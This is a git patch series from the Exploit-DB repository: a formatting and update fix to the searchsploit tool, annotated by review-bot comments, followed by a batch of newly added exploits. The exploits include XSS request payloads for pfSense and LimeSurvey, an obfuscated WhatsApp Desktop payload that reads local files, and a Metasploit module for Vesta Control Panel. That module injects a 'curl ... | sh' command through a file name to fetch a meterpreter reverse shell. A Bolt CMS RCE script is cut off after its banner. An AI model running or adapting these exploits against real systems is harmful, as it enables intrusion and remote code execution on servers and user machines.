From 87fab8631b7aeb229c63e900acc8ae8e35d6a208 Mon Sep 17 00:00:00 2001
From: g0tmi1k
Date: Mon, 6 Apr 2020 13:34:23 +0100
Subject: [PATCH 01/18] Fix apt install of exploitdb-{bin-sploits/papers}
---
searchsploit | 123 ++++++++++++++++++++++++++++-----------------------
1 file changed, 68 insertions(+), 55 deletions(-)
diff --git a/searchsploit b/searchsploit
index a18dff7eb..07e505173 100755
--- a/searchsploit
+++ b/searchsploit
@@ -1,6 +1,6 @@
 #!/bin/bash
 # Name: SearchSploit - Exploit-DB's CLI search tool
-# Version: 4.0.5 (2019-03-27)
+# Version: 4.0.6 (2020-04-06)
 # Written by: Offensive Security, Unix-Ninja, and g0tmi1k
 # Homepage: https://github.com/offensive-security/exploitdb
 # Manual: https://www.exploit-db.com/searchsploit
@@ -73,34 +73,34 @@ function usage() echo "=========" echo " Options " echo "=========" - echo " -c, --case [Term] Perform a case-sensitive search (Default is inSEnsITiVe)." - echo " -e, --exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies \"-t\"]." - echo " -h, --help Show this help screen." - echo " -j, --json [Term] Show result in JSON format." - echo " -m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory." - echo " -o, --overflow [Term] Exploit titles are allowed to overflow their columns." - echo " -p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible)." - echo " -t, --title [Term] Search JUST the exploit title (Default is title AND the file's path)." - echo " -u, --update Check for and install any exploitdb package updates (deb or git)." - echo " -w, --www [Term] Show URLs to Exploit-DB.com rather than the local path." - echo " -x, --examine [EDB-ID] Examine (aka opens) the exploit using \$PAGER." - echo " --colour Disable colour highlighting in search results." - echo " --id Display the EDB-ID value rather than local path." - echo " --nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)." 
+ echo " -c, --case [Term] Perform a case-sensitive search (Default is inSEnsITiVe)" + echo " -e, --exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies \"-t\"]" + echo " -h, --help Show this help screen" + echo " -j, --json [Term] Show result in JSON format" + echo " -m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory" + echo " -o, --overflow [Term] Exploit titles are allowed to overflow their columns" + echo " -p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible)" + echo " -t, --title [Term] Search JUST the exploit title (Default is title AND the file's path)" + echo " -u, --update Check for and install any exploitdb package updates (deb or git)" + echo " -w, --www [Term] Show URLs to Exploit-DB.com rather than the local path" + echo " -x, --examine [EDB-ID] Examine (aka opens) the exploit using \$PAGER" + echo " --colour Disable colour highlighting in search results" + echo " --id Display the EDB-ID value rather than local path" + echo " --nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)" echo " Use \"-v\" (verbose) to try even more combinations" - echo " --exclude=\"term\" Remove values from results. By using \"|\" to separated you can chain multiple values." - echo " e.g. --exclude=\"term1|term2|term3\"." + echo " --exclude=\"term\" Remove values from results. By using \"|\" to separated you can chain multiple values" + echo " e.g. --exclude=\"term1|term2|term3\"" echo "" echo "=======" echo " Notes " echo "=======" - echo " * You can use any number of search terms." - echo " * Search terms are not case-sensitive (by default), and ordering is irrelevant." - echo " * Use '-c' if you wish to reduce results by case-sensitive searching." - echo " * And/Or '-e' if you wish to filter results by using an exact match." - echo " * Use '-t' to exclude the file's path to filter the search results." 
- echo " * Remove false positives (especially when searching using numbers - i.e. versions)." - echo " * When updating or displaying help, search terms will be ignored." + echo " * You can use any number of search terms" + echo " * Search terms are not case-sensitive (by default), and ordering is irrelevant" + echo " * Use '-c' if you wish to reduce results by case-sensitive searching" + echo " * And/Or '-e' if you wish to filter results by using an exact match" + echo " * Use '-t' to exclude the file's path to filter the search results" + echo " * Remove false positives (especially when searching using numbers - i.e. versions)" + echo " * When updating or displaying help, search terms will be ignored" echo "" exit 2 } @@ -112,7 +112,8 @@ function update() arraylength="${#files_array[@]}" for (( i=0; i<${arraylength}; i++ )); do ## Check to see if we already have the value - [[ "${tmp_package[*]}" =~ "${package_array[${i}]}" ]] && continue + [[ "${tmp_package[*]}" =~ "${package_array[${i}]}" ]] \ + && continue ## Else save all the information tmp_git+=("${git_array[${i}]}") @@ -128,24 +129,24 @@ function update() path="${tmp_path[${i}]}" package="${tmp_package[${i}]}" - # Update from the repos (e.g. Kali) - dpkg -l "${package}" 2>/dev/null >/dev/null + ## Update from the repos (e.g. Kali) + apt-cache search "${package}" 2>/dev/null >/dev/null #dpkg -l "${package}" 2>/dev/null >/dev/null if [[ "$?" == "0" ]]; then updatedeb "${package}" else - # Update from homebrew (e.g. OSX) + ## Update from homebrew (e.g. OSX) brew 2>/dev/null >/dev/null if [[ "$?" == "0" ]]; then - # This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently + ## This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently updatedbrew "${package}" fi - # Update via Git + ## Update via Git updategit "${package}" "${path}" "${git}" fi done - # Done + ## Done exit 6 } 
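Review bot: The new repository check in update(), `apt-cache search "${package}" 2>/dev/null >/dev/null`, exits 0 whether or not anything matched — apt-cache search is a regex search over package names and descriptions and signals "nothing found" only through empty output — so on any apt-based host the following `if [[ "$?" == "0" ]]` always takes the updatedeb branch and the git fallback is never reached, which is the opposite of what the commit title suggests for hosts whose repos do not carry the package. I would test for a concrete package record instead, e.g. `apt-cache show "${package}" 2>/dev/null >/dev/null`, which returns non-zero when the package is unknown, or check that `apt-cache search --names-only "^${package}$"` printed something. The old `#dpkg -l "${package}" 2>/dev/null >/dev/null` kept as a trailing comment on the same line is commented-out code and should be deleted rather than carried along. update() starts before this hunk.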
@@ -158,11 +159,11 @@ function updatedeb() echo -e "[i] Updating via apt package management (Expect weekly-ish updates): ${package_in}\n" sudo apt update \ - || echo -e "\n[-] Issue with apt update (Please check network connectivity & apt SourcesList values)." 1>&2 + || echo -e "\n[-] Issue with apt update (Please check network connectivity & apt SourcesList values)" 1>&2 sudo apt -y install "${package_in}" \ - || echo -e "\n[-] Issue with apt upgrade." 1>&2 + || echo -e "\n[-] Issue with apt upgrade" 1>&2 - echo -e "\n[*] apt update finished." + echo -e "\n[*] apt update finished" } @@ -171,13 +172,13 @@ function updatedbrew() { package_in="${1}" - echo -e "[i] Updating via brew package management.\n" + echo -e "[i] Updating via brew package management\n" brew update \ - || echo -e "\n[-] Issue with brew update (Please check network connectivity)." 1>&2 + || echo -e "\n[-] Issue with brew update (Please check network connectivity)" 1>&2 brew upgrade "${package_in}" - echo -e "\n[*] Brew update finished." + echo -e "\n[*] Brew update finished" } @@ -232,7 +233,7 @@ function updategit() || sudo git pull -v upstream master fi - echo -e "\n[*] Git update finished." + echo -e "\n[*] Git update finished" echo "[i] Path: ${path_in}/" } @@ -277,7 +278,8 @@ function validterm() function searchsploitout() { ## Make sure there is a value - [ "${software}" = "" ] && return + [ "${software}" = "" ] \ + && return #echo "" 1>&2 @@ -373,6 +375,7 @@ function nmapxml() ;; "[PRODUCT]") ## We have a name, but no version (yet?) e.g. dnsmasq + echo "${software}" software="${input}" ;; "[VERSION]") @@ -395,7 +398,8 @@ function buildterms() ## If we are to use colour ("--colour"), add the values to search for between "or" if [[ "${COLOUR}" -eq 1 ]]; then - [[ "${COLOUR_TAG}" ]] && COLOUR_TAG="${COLOUR_TAG}|" + [[ "${COLOUR_TAG}" ]] \ + && COLOUR_TAG="${COLOUR_TAG}|" COLOUR_TAG="${COLOUR_TAG}${tag_in}" fi 
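Review bot: The `echo "${software}"` added in the "[PRODUCT]" case of nmapxml() writes the previous product name to stdout immediately before `software="${input}"` overwrites it, which reads like a debugging print left in: it would interleave bare product names with the normal result output, and presumably also with the JSON document when `--json` is used. If it is meant as progress information it should go to stderr, `echo "${software}" 1>&2`, or at least be guarded by the JSON flag; otherwise drop the line. nmapxml() starts and ends outside this hunk.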
@@ -406,7 +410,8 @@ function buildterms() ## Search just the title, NOT the path ("-t"/"-e") else ## If there is already a value, prepend text to get ready - [[ "${AWK_SEARCH}" ]] && AWK_SEARCH="${AWK_SEARCH}/ && ${CASE_TAG_FGREP}(\$3) ~ /" + [[ "${AWK_SEARCH}" ]] \ + && AWK_SEARCH="${AWK_SEARCH}/ && ${CASE_TAG_FGREP}(\$3) ~ /" ## Escape any slashes tag_in="$( echo ${tag_in} | sed 's_/_\\/_g' )" @@ -449,7 +454,7 @@ function findresults() ## EXACT search command ("-e")? if [[ "${EXACT}" -eq 1 ]]; then - buildterms "${TAGS}" + buildterms "${TAGS}" ## or AND search command? else ## For each term @@ -460,7 +465,8 @@ function findresults() ## If we are NOT to use the path name ("-t"/"-e") - [[ "${FILEPATH}" -eq 0 ]] && SEARCH="${SEARCH} | awk -F '[,]' '${CASE_TAG_FGREP}(\$3) ~ /${AWK_SEARCH}/ {print}'" + [[ "${FILEPATH}" -eq 0 ]] \ + && SEARCH="${SEARCH} | awk -F '[,]' '${CASE_TAG_FGREP}(\$3) ~ /${AWK_SEARCH}/ {print}'" ## If we are to use colour ("--colour"), add the value here @@ -470,7 +476,9 @@ function findresults() ## Dynamically set column widths to the current screen size - [[ "${WEBLINK}" -eq 1 ]] && COL2=45 || COL2=$(( ${#path_in} + 21 )) + [[ "${WEBLINK}" -eq 1 ]] \ + && COL2=45 \ + || COL2=$(( ${#path_in} + 21 )) COL1=$(( $( tput cols ) - COL2 - 1 )) @@ -489,7 +497,8 @@ function findresults() ## Remove any terms not wanted from the search - [[ "${EXCLUDE}" ]] && SEARCH="${SEARCH} | grep -vEi '${EXCLUDE}'" + [[ "${EXCLUDE}" ]] \ + && SEARCH="${SEARCH} | grep -vEi '${EXCLUDE}'" ## Magic search Fu @@ -531,7 +540,8 @@ function findresults() ## Display colour highlights ("--colour")? if [[ "${COLOUR_TAG}" ]] && [[ "${JSON}" -eq 0 ]]; then - [[ "${OUTPUT}" ]] && OUTPUT=$( echo -e "${OUTPUT}" | eval ${COLOUR_TAG} ) + [[ "${OUTPUT}" ]] \ + && OUTPUT=$( echo -e "${OUTPUT}" | eval ${COLOUR_TAG} ) fi } 
@@ -566,7 +576,8 @@ function printresults() ## Show content - [[ "${OUTPUT}" ]] && echo "${OUTPUT}" + [[ "${OUTPUT}" ]] \ + && echo "${OUTPUT}" ## Print footer if in JSON ("--json") @@ -589,11 +600,11 @@ if [[ -f "${HOME}/.searchsploit_rc" ]]; then elif [[ -f "/etc/searchsploit_rc" ]]; then rc_file="/etc/searchsploit_rc" ## Method #1 - File itself -elif [[ -f "$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/.searchsploit_rc" ]]; then - rc_file="$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/.searchsploit_rc" +elif [[ -f "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc" ]]; then + rc_file="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc" ## Method #2 - Symbolic link -elif [[ -f "$(dirname "$(readlink "$0")")/.searchsploit_rc" ]]; then - rc_file="$(dirname "$(readlink "$0")")/.searchsploit_rc" +elif [[ -f "$( dirname "$( readlink "$0" )" )/.searchsploit_rc" ]]; then + rc_file="$( dirname "$( readlink "$0" )" )/.searchsploit_rc" ## Manually specified? elif [[ ! -f "${rc_file}" ]]; then echo "[!] Could not find: rc_file ~ ${rc_file}" @@ -813,11 +824,11 @@ if [[ "${GETPATH}" -eq 1 ]]; then ## Linux (Will require $DISPLAY) if hash xclip 2>/dev/null; then echo -ne "${location}" | xclip -selection clipboard 2>/dev/null - echo "Copied EDB-ID #${edbdb}'s path to the clipboard." + echo "Copied EDB-ID #${edbdb}'s path to the clipboard" ## OSX elif hash pbcopy 2>/dev/null; then echo -ne "${location}" | pbcopy - echo "Copied EDB-ID #${edbdb}'s path to the clipboard." + echo "Copied EDB-ID #${edbdb}'s path to the clipboard" fi fi @@ -879,7 +890,8 @@ TAGS="$( echo ${TAGS} | sed -e 's/^[[:space:]]//' )" ## Print header if in JSON ("--json") -[[ "${JSON}" -eq 1 ]] && printf "{\n\t\"SEARCH\": \"${TAGS}\"" +[[ "${JSON}" -eq 1 ]] \ + && printf "{\n\t\"SEARCH\": \"${TAGS}\"" ## Check for files_*.csv 
@@ -900,7 +912,8 @@ done ## Print footer if in JSON ("--json") -[[ "${JSON}" -eq 1 ]] && printf "\n}\n" +[[ "${JSON}" -eq 1 ]] \ + && printf "\n}\n" ## Done From 85bef6929fae93d7aed3049ad516fc29467afe3f Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 7 Apr 2020 05:02:01 +0000 Subject: [PATCH 02/18] DB: 2020-04-07 17 changes to exploits/shellcodes Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) Frigate 3.36 - Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) Memu Play 7.1.3 - Insecure Folder Permissions Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) Microsoft NET USE win10 - Insufficient Authentication Logic LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit) WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting Bolt CMS 3.7.0 - Authenticated Remote Code Execution LimeSurvey 4.1.11 - 'File Manager' Path Traversal pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting --- exploits/freebsd/webapps/48300.txt | 39 ++++ exploits/multiple/webapps/48294.rb | 239 +++++++++++++++++++++ exploits/multiple/webapps/48295.txt | 42 ++++ exploits/php/webapps/48289.txt | 30 +++ exploits/php/webapps/48296.py | 167 +++++++++++++++ exploits/php/webapps/48297.txt | 18 ++ exploits/windows/dos/48284.py | 35 ++++ exploits/windows/dos/48285.py | 36 ++++ exploits/windows/dos/48286.py | 39 ++++ exploits/windows/dos/48287.py | 26 +++ exploits/windows/dos/48288.py | 23 ++ exploits/windows/dos/48290.py | 24 +++ exploits/windows/dos/48291.py | 22 ++ exploits/windows/dos/48292.txt | 22 ++ exploits/windows/local/48283.txt | 70 +++++++ exploits/windows/local/48293.py | 79 +++++++ exploits/windows/local/48299.txt | 313 ++++++++++++++++++++++++++++ files_exploits.csv | 17 ++ 18 files changed, 1241 insertions(+) create mode 100644 
exploits/freebsd/webapps/48300.txt
create mode 100755 exploits/multiple/webapps/48294.rb
create mode 100644 exploits/multiple/webapps/48295.txt
create mode 100644 exploits/php/webapps/48289.txt
create mode 100755 exploits/php/webapps/48296.py
create mode 100644 exploits/php/webapps/48297.txt
create mode 100755 exploits/windows/dos/48284.py
create mode 100755 exploits/windows/dos/48285.py
create mode 100755 exploits/windows/dos/48286.py
create mode 100755 exploits/windows/dos/48287.py
create mode 100755 exploits/windows/dos/48288.py
create mode 100755 exploits/windows/dos/48290.py
create mode 100755 exploits/windows/dos/48291.py
create mode 100644 exploits/windows/dos/48292.txt
create mode 100644 exploits/windows/local/48283.txt
create mode 100755 exploits/windows/local/48293.py
create mode 100644 exploits/windows/local/48299.txt
diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt
new file mode 100644
index 000000000..f485c9955
--- /dev/null
+++ b/exploits/freebsd/webapps/48300.txt
@@ -0,0 +1,39 @@ +# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.pfsense.org +# Version: PfSense 2.4.4-P3 +# Tested on: FreeBSD 11.2-RELEASE-p10 +# CVE : CVE-2020-11457 + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. +# Vulnerable Parameter : descr + + +# POC +# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. +# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is +# the id of the user containing the payload. + + +POST /system_usermanager.php?act=new HTTP/1.1 +Host: TARGET +Connection: close +Content-Length: 410 +Cache-Control: max-age=0 +Origin: https://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Sec-Fetch-Dest: document +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Referer: https://TARGET/system_usermanager.php?act=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d + 
+__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save \ No newline at end of file diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb new file mode 100755 index 000000000..53c997d1a --- /dev/null +++ b/exploits/multiple/webapps/48294.rb 
@@ -0,0 +1,239 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in v-list-user-backups bash script file. + Low privileged authenticated users can execute arbitrary commands under the context of the root user. + + An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. + During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As + result of that backup process, when an attacker try to list existing backups injected payload will be + executed. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], + ['CVE', '2020-10808'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8083, + 'WfsDelay' => 300, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2020", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(8083), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + deregister_options('FTPUSER', 'FTPPASS') + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def login + # + # This is very simple login process. Nothing important. + # We will be using cookie and csrf_token across the module so that we are global variable. + # + print_status('Retrieving cookie and csrf token values') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + }) + + if res && res.code == 200 && !res.get_cookies.empty? + @cookie = res.get_cookies + @csrf_token = res.body.scan(//).flatten[0] || '' + if @csrf_token.empty? 
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + print_good('Cookie and CSRF token values successfully retrieved') + + print_status('Authenticating to HTTP Service with given credentials') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + 'cookie' => @cookie, + 'vars_post' => { + 'token' => @csrf_token, + 'user' => username, + 'password' => password + } + }) + + if res && res.code == 302 && !res.get_cookies.empty? + print_good('Successfully authenticated to the HTTP Service') + @cookie = res.get_cookies + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + end + + def is_scheduled_backup_running + res = trigger_scheduled_backup + # + # MORE explaination. + # + if res && res.code == 302 + res = trigger_payload + if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') + return true + else + print_good('It seems scheduled backup is done ..! Triggerring payload <3') + return false + end + else + fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') + end + return false + end + + def trigger_payload + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), + }) + if res && res.code == 200 + res + else + fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') + end + end + + def trigger_scheduled_backup + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), + }) + if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// + res + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + end + + def payload_implant + # + # Our payload will be placed as a file name on FTP service. 
+ # Payload lenght can't be more then 255 and SPACE can't be used because of the + # bug in the backend software. Due to these limitations, I used web delivery method. + # + # When the initial payload executed. It will execute very short perl command, which is going to fetch + # actual python meterpreter first stager and execute it. + # + final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Yet another datastore variable overriding. + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + port_restore = datastore['RPORT'] + datastore['RPORT'] = 21 + datastore['FTPUSER'] = username + datastore['FTPPASS'] = password + + # + # Connecting to the FTP service with same creds as web ui. + # Implanting the very first stage of payload as a empty file. + # + if (not connect_login) + fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') + end + print_good('Successfully authenticated to the FTP service') + + res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") + if res.nil? + fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") + end + print_good('Successfully uploaded the payload as a file name') + disconnect + + # Revert datastore variables. + datastore['RPORT'] = port_restore + datastore['SSL'] = true if ssl_restore + end + + def exploit + start_http_server + payload_implant + login + trigger_scheduled_backup + print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') + while is_scheduled_backup_running == true + print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') + Rex.sleep(30) + end + stop_service + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! 
Sending 2nd stage of the payload') + second_stage = "python -c \"#{payload.encoded}\"" + send_response(cli, second_stage, {'Content-Type'=>'text/html'}) + end + + def start_http_server + # + # HttpClient and HttpServer use same SSL variable :( + # We don't need a SSL for payload delivery. + # + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("Second payload download URI is #{get_uri}") + # We need that global variable since get_uri keep using SSL from datastore + # We have to get the URI before restoring the SSL. + @second_stage_url = get_uri + datastore['SSL'] = true if ssl_restore + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt new file mode 100644 index 000000000..7e0e139ae --- /dev/null +++ b/exploits/multiple/webapps/48295.txt 
@@ -0,0 +1,42 @@ +# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting +# Date: 2020-01-21 +# Exploit Author: Gal Weizman +# Vendor Homepage: https://www.whatsapp.com +# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe +# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg +# Version: 0.3.9308 +# Tested On: Mac OS, Windows, iPhone +# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 + +// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) +// step 2: open devtools and search in all files "t=e.id" +// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found +// step 4: paste "https://example.com" in the text box and hit "Enter" +// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" + +var payload = `(async function() { + alert(navigator.userAgent); + (async function() { + // read "file:///C:/windows/system32/drivers/etc/hosts" content + const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); + const t = await r.text(); + alert(t); + }()) +}())`; + +payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; + +e.__x_matchedText = payload; + +e.__x_body = ` + Innocent text + + ${payload} + + More Innocent text +`; + +// step 6: press F8 in order for the execution to continue +// result: a message should be sent to the victim that once is clicked will execute the payload above + +// further information: https://github.com/weizman/CVE-2019-18426 \ No newline at end of file diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt new file mode 100644 index 000000000..213de9367 --- /dev/null +++ b/exploits/php/webapps/48289.txt 
@@ -0,0 +1,30 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11456 + +# Vulnerability Details +Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. +Vulnerable Parameter : "title" + + +# POC +POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 +Host: TARGET +Content-Length: 374 +Cache-Control: max-age=0 +Origin: http://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D +Connection: close + +YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0= \ No newline at end of file diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py new file mode 100755 index 000000000..9b3401a53 --- /dev/null +++ b/exploits/php/webapps/48296.py 
@@ -0,0 +1,167 @@ +# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution +# Date: 2020-04-05 +# Exploit Author: r3m0t3nu11 +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.x +# Tested on: Linux +# CVE : not-yet-0day + +# last version + +# p0c + + +#!/usr/bin/python + +import requests +import sys +import warnings +import re +import os +from bs4 import BeautifulSoup +from colorama import init +from termcolor import colored + +init() + +print(colored(''' + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ + ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ +▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ +▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ +▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ +▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ 